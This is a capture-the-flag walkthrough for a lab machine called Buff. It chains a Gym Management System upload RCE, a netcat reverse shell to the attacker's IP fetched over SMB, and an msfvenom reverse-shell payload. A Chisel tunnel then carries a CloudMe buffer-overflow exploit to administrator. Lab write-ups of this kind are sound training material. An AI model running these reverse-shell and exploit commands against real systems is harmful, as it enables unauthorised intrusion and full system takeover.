Buff


Contents

Intro


One of the boxes I'd consider to be on the harder end out of the boxes I've done so far - not because of its sheer difficulty, but the fact that all PoCs required some sort of tinkering/troubleshooting from me.

User


Running an nmap scan first:

sudo nmap -sC -sV 10.129.2.18

8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6

The machine hosting an Apache server utilizing PHP, and OpenSSL for encryption on a 64-bit Windows system. My first instinct was to searchsploit all three services, but coincidentally nothing of use was found.

There's nothing out of the ordinary at first - the webpage simply presents us with information regarding "mrb3n's Bro Hut" in all sections aside from Contact. The latter looks like this:

"mrb3n's Bro Hut - Made using Gym Management Software 1.0"

This on the other hand, has numerous exploits tied to its name...

searchsploit gym management
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection          | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass       | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code | php/webapps/48506.py
GYM MS - GYM Management System - Cross Site Scripting ( | php/webapps/51777.txt
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results

This allows us to either log onto the website, or execute code, leading to a reverse shell on the box. The remote code exploit documentation tells us that there's an /upload/ endpoint, where you can upload images. with a maliciously crafted payload, this can result in a webshell.

python exploit.py 'http://10.129.2.18:8080/'
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[*] Uploading payload...
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff/shaun

However, the connection isn't persistent, so getting the user flag is just a tad bit more difficult:

type \users\shaun\desktop\user.txt
�PNG

*flag*

Root


Before getting to root, I want to try upgrading from the webshell, which I'll do with downloading nc.exe on the machine via an SMB share:

--- On my machine ---

cp /usr/share/windows-resources/binaries/nc.exe ./nc.exe

impacket-smbserver share . -smb2support

--- On shaun ---

C:\xampp\htdocs\gym\upload> copy \\10.10.15.8\share\nc.exe \users\shaun\nc.exe
�PNG

        1 file(s) copied.

C:\xampp\htdocs\gym\upload> \users\shaun\nc.exe -e cmd 10.10.15.8

Of course, a listener on my machine was set up via nc -lvnp 4567 alongside running nc.exe on Buff.

Once this was done, I ran winPEAS - under TCP connections, I found something peculiar:

Enumerating IPv4 connections

  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name
...
  TCP        127.0.0.1             8888          0.0.0.0               0               Listening         8688            CloudMe

This service seems to match what was inside of shaun's Downloads folder

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  13:27              .
14/07/2020  13:27              ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   9,790,558,208 bytes free

If we searchsploit for CloudMe, some exploits seem to match the version number.

searchsploit cloudme
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
...
---------------------------------------------- ---------------------------------
Shellcodes: No Results

The PoC makes use of an msfvenom payload as a base, which can be modified to net a reverse shell (msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.15.8 LPORT=7654 -b '\x00\x0A\x0D' -f python -v payload). However, python is not installed on Buff. In order for the exploit to work from my machine, I set up a tunnel between the machines via Chisel. By default, that's not on the Windows machine either, so I set up the SMB share again.

Setting the tunnel up can be done in two steps:

Chisel runs as server on my machine on selected port
                         ^
                         |
                         |
                         |
Chisel runs as client on victim machine and connects to mine

First I run chisel in server mode:

./lchisel server -p 3525 --reverse
2026/06/21 15:39:13 server: Reverse tunnelling enabled
2026/06/21 15:39:13 server: Fingerprint WZfY9BV6hXDieGH/UgZsKAYekt5JdWs5fXiDa23YyA4=
2026/06/21 15:39:13 server: Listening on http://0.0.0.0:3525

Then I run it in client mode from the victim machine:

chisel.exe client 10.10.15.8:3525 R:8888:localhost:8888
chisel.exe client 10.10.15.8:3525 R:8888:localhost:8888
2026/06/21 20:40:57 client: Connecting to ws://10.10.15.8:3525
2026/06/21 20:40:57 client: Connected (Latency 78.7018ms)

Once that's done, you can see the client being connected to my machine:

2026/06/21 15:40:56 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening

All that's left is for me to set up a listener again, and run the exploit:

--- Terminal 1 ---

nc -lnvp 7654

--- Terminal 2 ---

python3 exploit.py

Following the exploit, I catch a shell finally:

Listening on 0.0.0.0 7654
Connection received on 10.129.2.18 49815
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

Good luck to anyone else trying this box!